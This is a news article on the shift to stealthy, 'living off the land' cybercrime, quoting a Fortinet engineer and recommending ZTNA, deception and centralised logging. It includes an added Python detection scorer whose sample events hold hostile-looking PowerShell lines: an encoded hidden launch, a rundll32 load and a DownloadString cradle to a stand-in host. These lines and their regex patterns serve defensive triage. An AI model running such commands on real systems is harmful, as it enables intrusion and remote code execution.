Cybercriminals are transitioning from a “smash ‘n grab” approach to a stealthier strategy. They now spend more time comprehending victim environments, extracting a greater amount of data, and aiming to maximise their profits per attack.
This shift indicates cybercrime has become increasingly sophisticated and potentially more harmful, says Dale de Kok, systems engineer at Fortinet Southern Africa. “In the past, cybercrime was like a quick theft on the street, where a robber would snatch your bag from your car and flee. Nowadays, they also take your car, address, and house keys – for a robbery of higher value.”
De Kok says one reason attackers have adapted their methods is that organisations have become better at backing up their information. “Attackers know defenders have better backups, so they moved to extortion and stealthy lateral movement to access more of the environment. If they exfiltrate the data of every system or move to ESXi or hypervisor servers and encrypt the entire environment, they could cripple you. They are finding ways to guarantee you will pay.
“The longer they are inside your organisation, the higher the cost to remediate that. After six months, you might have to scrap the entire environment and build it again from scratch,” he says.
To hide in plain sight, attackers are increasingly “living off the land” to camouflage themselves. They utilise legitimate business software to blend in, explains De Kok. “Once they gain initial access through compromised endpoints or email, they rely on embedded applications like PowerShell or DLL files for lateral movement. This allows them to download payloads from the internet and directly inject them into memory.”
Detecting the use of these embedded apps and binaries, which are part of the operating system, has become more challenging. While increased monitoring can help identify anomalous behaviour in such attacks, it also leads to a higher volume of noise being generated.
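As an added illustration of the detection problem just described (example code written for this page, not Fortinet's or the article's own), the Python scorer below weighs several weak PowerShell and operating-system-binary indicators together with parent-process context, so that a single administrative use of PowerShell stays below the alert threshold while a combination does not. All hostnames, process names, command lines, indicator weights and the admin-host discount are constructed assumptions for the example.

```python
import re

# Constructed sample process-creation events (hostname, parent process, command
# line), in the shape an EDR or Windows event 4688 export might produce.
ENC = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"  # constructed filler, not a real payload
SAMPLE_EVENTS = [
    ("ws-017", "outlook.exe", f"powershell.exe -nop -w hidden -enc {ENC}"),
    ("ws-017", "powershell.exe", r"rundll32.exe C:\Users\Public\stage.dll,DllMain"),
    ("admin-jump", "cmd.exe", f"powershell.exe -nop -w hidden -enc {ENC}"),
    ("ws-042", "explorer.exe", r"powershell.exe Get-ChildItem C:\Reports"),
    ("ws-042", "winword.exe",
     "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"),
]

# Weighted indicators: one hit is routine admin noise, a combination is a signal.
INDICATORS = [
    (r"(?i)\s-(?:enc|encodedcommand)\b", 3, "encoded command"),
    (r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b", 3, "download cradle"),
    (r"(?i)\biex\b|invoke-expression", 2, "in-memory execution"),
    (r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile", 1, "hidden or no-profile"),
    (r"(?i)\\users\\public\\|\\appdata\\local\\temp\\", 2, "binary in user-writable path"),
]
OFFICE_PARENTS = {"outlook.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ALERT_THRESHOLD = 4


def score_event(host, parent, cmdline):
    """Return (score, reasons) for one event; parent context weighs as much as the command."""
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, cmdline):
            score, reasons = score + weight, reasons + [label]
    if parent.lower() in OFFICE_PARENTS:
        score, reasons = score + 3, reasons + [f"spawned by {parent}"]
    elif parent.lower() in SCRIPT_HOSTS:
        score, reasons = score + 2, reasons + [f"spawned by {parent}"]
    return score, reasons


def triage(events, admin_hosts=frozenset({"admin-jump"})):
    """Keep events at or above the threshold; discount (never silence) known admin hosts."""
    alerts = []
    for host, parent, cmdline in events:
        score, reasons = score_event(host, parent, cmdline)
        if host in admin_hosts and parent.lower() not in OFFICE_PARENTS:
            score -= 2  # the same command on a jump host is expected admin activity
        if score >= ALERT_THRESHOLD:
            alerts.append((host, score, reasons))
    return alerts
```

Running `triage(SAMPLE_EVENTS)` alerts on the two workstation PowerShell launches and the rundll32 load from a user-writable path, while the identical encoded command on the jump host and the plain directory listing are left as noise.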
Layered risk mitigation
Mitigating risk in the ever-evolving cyber-security landscape requires a layered approach, says De Kok. “Enhanced cyber security primarily relies on achieving comprehensive visibility. It is crucial to clearly understand your environment, including the devices present, potential vulnerabilities, and critical security checkpoints to effectively apply protective measures.”
Organisations must possess the capability to track attackers’ progression through the various stages of the kill chain to find out if any exposure has already occurred. For this, reliance on threat intelligence vendors and digital protection services becomes imperative. These services monitor the dark web for any indications of access or data from your environment being sold, providing valuable insights for proactive defence.
De Kok highlights key security measures that are essential for safeguarding systems. These measures include securing external-facing systems, implementing network segmentation, enabling multi-factor authentication, and embarking on a journey towards Zero Trust Network Access (ZTNA).
“By adopting ZTNA, organisations can ensure that only authorised individuals with the appropriate security posture can access the network. It allows for the identification of devices attempting to access systems and applications, enabling the application of dynamic security controls to ensure proper protection,” he says.
“To tackle the more sophisticated reconnaissance conducted by attackers, organisations need to use deception technologies such as FortiDeceptor. These technologies involve deploying fake Windows servers or business applications that appear genuine, enticing attackers. This triggers alerts, providing early warning signs,” he explains. “Deception offers a straightforward and cost-effective solution. It uses automation to react to high fidelity alerts and takes compromised devices off the network.”
Quick wins
While multi-layered security and ZTNA are important security goals, achieving them is a long-term project. “You can’t just flick a switch and turn on ZTNA. Achieving it is a lengthy process that doesn’t happen overnight. However, there are some ‘quick wins’ that can immediately improve your security posture and contribute to your broader cyber security objectives.”
Centralised logging is probably one of the easiest quick wins. It also helps you build up the asset register, get a view of the environment, and generate data necessary for incident response if you get hacked. It’s also a fairly passive rollout compared to endpoint solutions and ZTNA, which take planning and can have friction points, he says.
Overall, implementing the right security measures and leveraging deception technologies can significantly enhance an organisation’s defence against cyber threats.